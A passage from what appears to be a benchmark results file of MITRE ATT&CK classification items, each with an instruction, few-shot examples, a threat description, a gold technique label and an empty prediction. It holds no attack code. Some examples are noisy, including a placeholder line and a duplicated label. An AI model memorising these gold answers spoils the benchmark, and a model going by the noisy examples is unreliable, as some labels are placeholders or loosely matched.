container.\n\t - T1610: Deploy Container\n- Text: Doki\u2019s container was configured to bind the host root directory.\n\t - T1611: Escape to Host\n- Text: Kinsing was executed with an Ubuntu container entry point that runs shell scripts.\n\t - T1609: Container Administration Command\n", + "input": "Doki was run through a deployed container.", + "gold": "- T1610: Deploy Container", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DCSrv has masqueraded its service as a legitimate svchost.exe process.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: DCSrv has created new services for persistence by modifying the Registry.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Honeybee launches a DLL file that gets executed as a service using svchost.exe\n\t - T1569.002: System Services - Service Execution\n", + "input": "TinyTurla has mimicked an existing Windows service by being installed as \"Windows Time Service\".", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1087.003: Account Discovery - Email Account\n- Text: CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim\u2019s machine.\n\t - T1539: Steal Web Session Cookie\n- Text: Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.\n\t - T1176: Browser Extensions\n", + "input": "ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: Kimsuky has set auto-forward rules on victim's e-mail accounts.\n\t - T1114.003: Email Collection - Email Forwarding Rule\n- Text: Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.\n\t - T1589.002: Gather Victim Identity Information - Email Addresses\n", + "input": "Silent Librarian has established e-mail accounts to receive e-mails forwarded from compromised accounts.", + "gold": "- T1585.002: Establish Accounts - Email Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.\n\t - T1059: Command and Scripting Interpreter\n\t - T1202: Indirect Command Execution\n- Text: Confucius has used mshta.exe to execute malicious VBScript.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Peppy has the ability to execute shell commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Revenge RAT uses the Forfiles utility to execute commands on the system.", + "gold": "- T1202: Indirect Command Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1560: Archive Collected Data\n- Text: Crutch has used the WinRAR utility to compress and encrypt stolen files.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1049: System Network Connections Discovery\n", + "input": "RunningRAT contains code to compress files.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: jRAT can browse file systems.\n\t - T1083: File and Directory Discovery\n- Text: Kinsing has used chmod to modify permissions on key files for use.\n\t - T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification\n- Text: InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.\n\t - T1518: Software Discovery\n", + "input": "P.A.S. Webshell has the ability to list files and file characteristics including extension, size, ownership, and permissions.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOKKI has used FTP for C2 communications.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: Crutch has used a hardcoded GitHub repository as a fallback channel.\n\t - T1008: Fallback Channels\n- Text: Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "Kazuar uses FTP and FTPS to communicate with the C2 server.", + "gold": "- T1071.002: Application Layer Protocol - File Transfer Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n- Text: KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies\n\t - T1005: Data from Local System\n", + "input": "Lizar has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.", + "gold": "- T1555.004: Credentials from Password Stores - Windows Credential Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain the computer name, OS version, and default language identifier.\n\t - T1082: System Information Discovery\n- Text: A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.\n\t - T1033: System Owner/User Discovery\n- Text: APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.\n\t - T1480.001: Execution Guardrails - Environmental Keying\n", + "input": "Machete collects the hostname of the target computer.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:\n\t - T1552.004: Unsecured Credentials - Private Keys\n- Text: APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n- Text: Uses Mimikatz to harvest credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "Operation Wocao has used Mimikatz to dump certificates and private keys from the Windows certificate store.", + "gold": "- T1552.004: Unsecured Credentials - Private Keys", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application\n\t - T1082: System Information Discovery\n- Text: Zebrocy gets the username from the system.\n\t - T1033: System Owner/User Discovery\n- Text: FELIXROOT collects information about the network including the IP address and DHCP server.\n\t - T1016: System Network Configuration Discovery\n", + "input": "Micropsia gathers the hostname and OS version from the victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.\n\t - T1568: Dynamic Resolution\n- Text: Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire\n\t - T1102: Web Service\n- Text: PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.\n\t - T1102.001: Web Service - Dead Drop Resolver\n", + "input": "SUNBURST dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.", + "gold": "- T1568: Dynamic Resolution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte\n\t - T1560: Archive Collected Data\n", + "input": "Machete\u2019s downloaded data is decrypted using AES.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before the driver is loaded, the malware disables crash dump by setting the following registry key\n\t - T1070: Indicator Removal\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n- Text: GrimAgent can delete previously created tasks on a compromised host.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections\n\t - T1070.005: Indicator Removal - Network Share Connection Removal\n", + "input": "FunnyDream has the ability to clean traces of malware deployment.", + "gold": "- T1070: Indicator Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: USBferry can detect the victim's file or folder list.\n\t - T1083: File and Directory Discovery\n- Text: [Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I\u2019d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future\n\t - T1113: Screen Capture\n- Text: can record the sounds from microphones on a computer.\n\t - T1123: Audio Capture\n", + "input": "ELMER is capable of performing directory listings.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).\n\t - T1112: Modify Registry\n- Text: APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.\n\t - T1556.007: Modify Authentication Process - Hybrid Identity\n- Text: SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.\n\t - T1556: Modify Authentication Process\n", + "input": "AADInternals can modify registry keys as part of setting a new pass-through authentication agent.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Metamorfo can enumerate all windows on the victim\u2019s machine.\n\t - T1010: Application Window Discovery\n- Text: HotCroissant can retrieve a list of applications from the \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\" registry key.\n\t - T1518: Software Discovery\n- Text: NavRAT uses \"tasklist /v\" to check running processes.\n\t - T1057: Process Discovery\n", + "input": "QakBot has the ability to enumerate windows on a compromised host.", + "gold": "- T1010: Application Window Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: leveraged the DDE protocol to deliver their malware.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: 1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including\n\t - T1204.002: User Execution - Malicious File\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "GravityRAT has been delivered via Word documents using DDE for execution.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: njRAT can collect data from a local system.\n\t - T1005: Data from Local System\n- Text: Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: OutSteel can automatically upload collected files to its C2 server.\n\t - T1020: Automated Exfiltration\n", + "input": "KONNI has used FTP to exfiltrate reconnaissance data out.", + "gold": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n- Text: Kessel has trojanized the ssh_login\" and \"user-auth_pubkey\" functions to steal plaintext credentials.\n\t - T1556: Modify Authentication Process\n- Text: No matching sample found for T1562.003\n", + "input": "Ebury can hook logging functions so that nothing from the backdoor gets sent to the logging facility.", + "gold": "- T1562.006: Impair Defenses - Indicator Blocking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Turla has used spearphishing via a link to get users to download and run their malware.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "APT33 has sent spearphishing emails containing links to .hta files.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.\n\t - T1518: Software Discovery\n- Text: Carbon uses the \"netstat -r\" and \"netstat -an\" commands.\n\t - T1049: System Network Connections Discovery\n- Text: Gamaredon Group has used WMI to execute scripts used for discovery.\n\t - T1047: Windows Management Instrumentation\n", + "input": "MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Web shells are heavily relied on for nearly all stages of the attack lifecycle\n\t - T1505.003: Server Software Component - Web Shell\n", + "input": "China Chopper's server component executes code sent via HTTP POST commands.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: adds an entry to the rc.common file for persistence.\n\t - T1037.004: Boot or Logon Initialization Scripts - RC Scripts\n- Text: gains persistence by adding the Registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "HiddenWasp installs reboot persistence by adding itself to \"/etc/rc.local\".", + "gold": "- T1037.004: Boot or Logon Initialization Scripts - RC Scripts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses a Port 22 malware variant to modify several Registry keys.\n\t - T1112: Modify Registry\n- Text: gathers information about opened windows.\n\t - T1010: Application Window Discovery\n- Text: Misdat is capable of deleting Registry keys used for persistence.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "SOUNDBITE is capable of enumerating and manipulating files and directories.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal\n\t - T1105: Ingress Tool Transfer\n- Text: These privilege escalation modules are the ones we caught when we queried for Jian\u2019s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Astaroth uses the LoadLibraryExW() function to load additional modules.\n\t - T1129: Shared Modules\n", + "input": "Pandora can load additional drivers and files onto a victim machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat 